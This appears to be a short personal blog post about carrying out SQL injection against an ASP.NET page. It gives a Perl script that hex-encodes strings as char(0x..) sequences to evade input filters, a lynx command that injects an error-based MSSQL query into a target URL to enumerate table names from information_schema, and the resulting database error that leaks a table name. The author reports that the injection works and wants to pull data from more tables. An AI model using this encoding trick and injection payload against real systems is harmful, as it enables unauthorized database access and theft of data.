My friend told me to encode some of the injection parameter from ascii to hex code. So I write a small perl script to do the job for me:
shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
my $cmd = shift or die "usage: $0 string\n";
$cmd =~ s/(.)/ sprintf("char(0x%2x)%2B",ord($1)) /ge;
chomp($cmd);
print "$cmd\n";
shaolinint@slash$ perl ascii2hex.pl table1 char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)
I had to removed the '%2B' at the end of the code above to make it work on real injections:
shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.
The injections parameter working fine for me. But there is small problem, I still can not get the data from all tables and columns at the moment.
No comments:
Post a Comment